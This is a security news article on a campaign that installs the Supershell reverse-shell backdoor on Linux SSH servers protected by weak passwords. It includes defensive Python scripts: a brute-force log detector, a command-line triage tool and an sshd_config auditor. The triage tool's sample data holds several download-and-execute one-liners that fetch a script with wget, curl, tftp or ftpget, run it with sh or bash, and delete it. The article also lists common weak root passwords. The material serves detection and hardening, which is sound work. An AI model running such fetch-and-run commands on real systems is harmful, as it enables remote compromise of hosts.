Thursday, May 22, 2025

Hackers Using Supershell Malware To Attack Linux SSH Servers


Researchers at AhnLab's ASEC have identified an attack campaign against poorly secured Linux SSH servers that installs Supershell, a cross-platform reverse-shell backdoor written in Go, to give the attackers remote control of compromised systems.

Following the initial infection, the attackers are believed to have deployed scanners to find further vulnerable targets and then run dictionary attacks against them, using credentials harvested from the systems they had already compromised.

[Figure: GitHub page of Supershell]

The recovered data lists threat-actor IP addresses alongside the root credentials they used, including common pairs such as "root/password" and "root/123456789", which attackers routinely try first when brute-forcing exposed SSH services.
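The dictionary attack described above leaves a recognisable trace in the SSH daemon's log: a burst of failed password logins from one address, sometimes followed by an accepted login from that same address. The script below is an added example (it is not ASEC's tooling or anything from this article) that detects that sequence in auth.log-style lines. The log lines, host name, addresses and the 5-failures-in-60-seconds threshold are constructed for the example, and the year is assumed because syslog timestamps omit it.

```python
"""Flag SSH dictionary attacks in auth.log-style lines.

Added example, not from the ASEC report or this article: counts failed
password logins per source IP inside a sliding window and flags a later
successful login from an IP that was already brute-forcing, which is the
sequence a credential-guessing intrusion leaves behind.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in classic syslog auth.log format (not real data).
SAMPLE_LOG = """\
Sep  7 10:00:01 host sshd[1201]: Failed password for root from 203.0.113.5 port 40012 ssh2
Sep  7 10:00:02 host sshd[1203]: Failed password for root from 203.0.113.5 port 40013 ssh2
Sep  7 10:00:03 host sshd[1205]: Failed password for root from 203.0.113.5 port 40014 ssh2
Sep  7 10:00:04 host sshd[1207]: Failed password for root from 203.0.113.5 port 40015 ssh2
Sep  7 10:00:05 host sshd[1209]: Failed password for root from 203.0.113.5 port 40016 ssh2
Sep  7 10:00:06 host sshd[1211]: Failed password for invalid user admin from 203.0.113.5 port 40017 ssh2
Sep  7 10:00:09 host sshd[1213]: Accepted password for root from 203.0.113.5 port 40018 ssh2
Sep  7 10:05:00 host sshd[1301]: Failed password for alice from 198.51.100.9 port 51000 ssh2
Sep  7 10:05:30 host sshd[1303]: Accepted publickey for alice from 198.51.100.9 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_ts(ts: str, year: int = 2024) -> datetime:
    # syslog timestamps carry no year; one is assumed so windows can be computed
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_dictionary_attacks(log_text: str, threshold: int = 5, window_s: int = 60):
    """Return (brute_forcers, compromised).

    brute_forcers: {ip: most failures seen inside one window_s window}
    compromised:   [(ip, user, method)] for Accepted logins from flagged IPs
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    brute_forcers = {}
    compromised = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, t = m["ip"], parse_ts(m["ts"])
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(t)
            while (t - q[0]).total_seconds() > window_s:   # slide the window forward
                q.popleft()
            if len(q) >= threshold:
                brute_forcers[ip] = max(brute_forcers.get(ip, 0), len(q))
        elif ip in brute_forcers:
            # a success right after a burst of failures is the signal that matters
            compromised.append((ip, m["user"], m["method"]))
    return brute_forcers, compromised


if __name__ == "__main__":
    bf, comp = detect_dictionary_attacks(SAMPLE_LOG)
    for ip, n in bf.items():
        print(f"dictionary attack from {ip}: {n} failures within window")
    for ip, user, method in comp:
        print(f"LIKELY COMPROMISE: {user} accepted via {method} from {ip}")
```

On the constructed sample the single failed login from 198.51.100.9 never reaches the threshold, so alice's key-based login is not reported; the root login from 203.0.113.5 is, because it follows six failures in a few seconds.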

Credentials this weak are a serious risk: a single correct guess gives the attacker a root shell from which to run malicious code, steal sensitive data and disrupt operations, so finding and fixing such accounts before an attacker does is essential.

After compromising a system, the threat actor used several methods to download and execute malicious scripts.

The attacker used wget, curl, tftp and ftpget to fetch scripts from a range of sources, including web servers, FTP servers and, in some cases, servers listening on non-standard ports.

[Figure: Obfuscated Supershell]

The downloaded scripts were then run with sh or bash, giving the attacker remote access and potentially installing additional malware; afterwards the attacker tried to cover their tracks by deleting the downloaded scripts and other files.
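The fetch, execute and delete sequence described above is easy to recognise in shell history or auditd command records once a command line is broken into its pipeline and separator parts. The script below is an added example (not ASEC's code or anything from this article) that scores a command line on four signals: a wget/curl/tftp/ftpget fetch, a fetch from a non-standard port, execution of the fetched file by sh/bash (or of the fetch's piped output), and a later rm of the same file. The sample command lines, hosts and file names are constructed; ports passed as tftp/ftpget options rather than in a URL are not parsed, which is a known gap of this example.

```python
"""Flag download-and-execute command lines of the kind used after SSH compromise.

Added example, not ASEC's code or this article's. A command line is split on
shell separators; a wget/curl/tftp/ftpget fetch, a non-standard port, an
execution by sh/bash of the fetched file (or of the fetch's piped output) and
a later rm of the same file each add one point. Hosts and names are constructed.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SHELLS = {"sh", "bash", "dash"}
STANDARD_PORTS = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}
SEP_RE = re.compile(r"\s*(\|\||&&|;|\|)\s*")   # captured, so separators are kept
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample command lines (as seen in shell history or auditd), not real captures.
SAMPLES = [
    "cd /tmp; wget http://198.51.100.23:8080/x.sh; sh x.sh; rm -f x.sh",
    "curl -s http://203.0.113.44/bins/run.sh | bash",
    "tftp -g -r sshd.sh 192.0.2.7 && chmod +x sshd.sh && ./sshd.sh",
    "ftpget -u anon -p anon 192.0.2.7 /tmp/a.sh a.sh; sh /tmp/a.sh; rm -rf /tmp/a.sh",
    "curl -fsSL https://deb.nodesource.com/setup_20.x -o setup.sh",
    "sudo apt-get update && sudo apt-get install -y vim",
]


@dataclass
class Finding:
    cmdline: str
    fetch_host: str = ""            # host the script was fetched from ("?" if not parsed)
    nonstandard_port: bool = False
    executed: bool = False
    cleaned_up: bool = False

    def score(self) -> int:
        return sum([bool(self.fetch_host), self.nonstandard_port,
                    self.executed, self.cleaned_up])


def base(path: str) -> str:
    return path.rstrip("/").rsplit("/", 1)[-1]


def analyse(cmdline: str) -> Finding:
    f = Finding(cmdline)
    parts = SEP_RE.split(cmdline.strip())
    segments, seps = parts[0::2], parts[1::2]   # seps[i] joins segments[i] and [i+1]
    names = set()                               # file names the fetch may have written
    fetch_idx = None
    for i, seg in enumerate(segments):
        tokens = seg.split()
        if not tokens:
            continue
        cmd, args = base(tokens[0]), tokens[1:]
        if cmd in DOWNLOADERS and fetch_idx is None:
            fetch_idx = i
            for tok in args:
                if "://" in tok:                           # wget/curl style URL
                    u = urlsplit(tok)
                    f.fetch_host = u.hostname or "?"
                    f.nonstandard_port = (u.port is not None
                                          and u.port != STANDARD_PORTS.get(u.scheme))
                    names.add(base(u.path))
                elif IPV4_RE.match(tok):                   # tftp/ftpget take a bare host
                    f.fetch_host = tok
                elif not tok.startswith("-"):              # remote/local file operands
                    names.add(base(tok))
            f.fetch_host = f.fetch_host or "?"
            names.discard("")
        elif fetch_idx is not None:
            if cmd in SHELLS:
                piped = i == fetch_idx + 1 and seps[fetch_idx] == "|"
                if piped or any(base(a) in names for a in args):
                    f.executed = True
            elif cmd in names:                             # ./x.sh run directly
                f.executed = True
            elif cmd == "rm" and any(base(a) in names for a in args):
                f.cleaned_up = True
    return f


def triage(cmdlines, min_score: int = 2):
    """Return the command lines whose finding score reaches min_score."""
    return [c for c in cmdlines if analyse(c).score() >= min_score]


if __name__ == "__main__":
    for c in SAMPLES:
        r = analyse(c)
        print(f"score={r.score()} host={r.fetch_host} exec={r.executed} "
              f"rm={r.cleaned_up} port!={r.nonstandard_port} :: {c}")
```

A score of 2 or more separates the four attacker-style lines from the plain package install and from a download that is never executed; a fetch alone is not malicious, which is why the fetch only contributes one point.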

The backdoor the attacker installed on the poorly managed Linux system was an obfuscated build of Supershell; ASEC identified it from its internal strings, its behaviour and the execution logs it left, and it gives the attacker full remote control of the host.

While the primary goal appears to be taking control of the system, the attacker may also intend to install a cryptocurrency miner such as XMRig to monetise the system's resources, which fits the common pattern of attacks on exposed Linux hosts.

[Figure: Log showing Supershell's execution]

In short, threat actors are exploiting poorly managed Linux SSH servers by installing the Supershell backdoor, which gives them remote control of infected systems and can lead to data theft, further compromise and other malicious activity.

According to ASEC, administrators should mitigate this threat by enforcing strong password hygiene (or replacing passwords with keys), applying updates regularly, and restricting access to SSH with firewalls and similar controls.

ASEC also recommends keeping AhnLab's V3 anti-malware product up to date to block the malware itself. Together these countermeasures substantially reduce an organisation's exposure to Supershell attacks.
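The password-hygiene advice above translates into a handful of sshd_config directives, and an audit can check them mechanically. The script below is an added example (not from ASEC or this article) that parses sshd_config text the way sshd reads it (first value wins, and only the global section before any Match block is considered) and reports directives left at, or set to, values that let a dictionary attack succeed. The weak and hardened configurations, the user names in AllowUsers, and the MaxAuthTries limit of 3 are constructed choices for the example; the defaults in DEFAULTS are OpenSSH's documented ones.

```python
"""Audit an sshd_config for the settings that let SSH dictionary attacks succeed.

Added example, not from ASEC or this article. It parses sshd_config text
(global section only: first value wins, Match blocks are left out) and reports
directives that are missing or set to a weak value. The two configs below are
constructed; DEFAULTS follows sshd_config(5).
"""

# Constructed example of a weak configuration (the kind the campaign above targets).
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication yes
MaxAuthTries 10
UsePAM yes
"""

# Constructed hardened counterpart: keys only, no root logins, few guesses per connection.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
MaxAuthTries 3
LoginGraceTime 30
AllowUsers deploy ops
"""

# OpenSSH defaults for the directives checked (sshd_config(5)).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "pubkeyauthentication": "yes",
    "maxauthtries": "6",
}
# Older name for KbdInteractiveAuthentication, still accepted by sshd.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}


def parse_sshd_config(text: str) -> dict:
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()               # drop comments
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)  # "Key value" or "Key=value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":                                # conditional blocks: out of scope
            break
        key = ALIASES.get(key, key)
        cfg.setdefault(key, value)                        # sshd keeps the first value it sees
    return cfg


def audit(text: str) -> list:
    cfg = parse_sshd_config(text)

    def eff(key):                                         # effective value, defaults applied
        return cfg.get(key, DEFAULTS[key]).lower()

    findings = []
    if eff("permitrootlogin") not in ("no", "prohibit-password"):
        findings.append("PermitRootLogin permits root password logins; set it to no")
    if eff("passwordauthentication") != "no":
        findings.append("PasswordAuthentication is on; dictionary attacks stay possible")
    if eff("kbdinteractiveauthentication") != "no":
        findings.append("KbdInteractiveAuthentication is on; PAM can still accept passwords")
    if eff("pubkeyauthentication") != "yes":
        findings.append("PubkeyAuthentication is off; keys are the replacement for passwords")
    if int(eff("maxauthtries")) > 3:
        findings.append(f"MaxAuthTries is {eff('maxauthtries')}; lower it to 3")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"[{name}] {len(audit(text))} finding(s)")
        for msg in audit(text):
            print("  -", msg)
```

Note that an empty file is not safe either: OpenSSH's defaults leave password and keyboard-interactive authentication enabled, so the audit reports three findings for it. Disabling PasswordAuthentication alone is a common half-measure; with UsePAM and KbdInteractiveAuthentication still on, PAM can continue to accept passwords.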

ASEC's detection names for the samples cover a Cobalt Strike backdoor, a shell-agent downloader and an ElfMiner downloader. The backdoor, detected as Backdoor/Linux.CobaltStrike.3753120, was likely deployed for remote access and control.

The shell-agent downloader, Downloader/Shell.Agent.SC203780, was designed to fetch and execute additional malicious payloads.

The ElfMiner downloader, Downloader/Shell.ElfMiner.S1705, was likely used to download and install cryptocurrency-mining malware.

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.
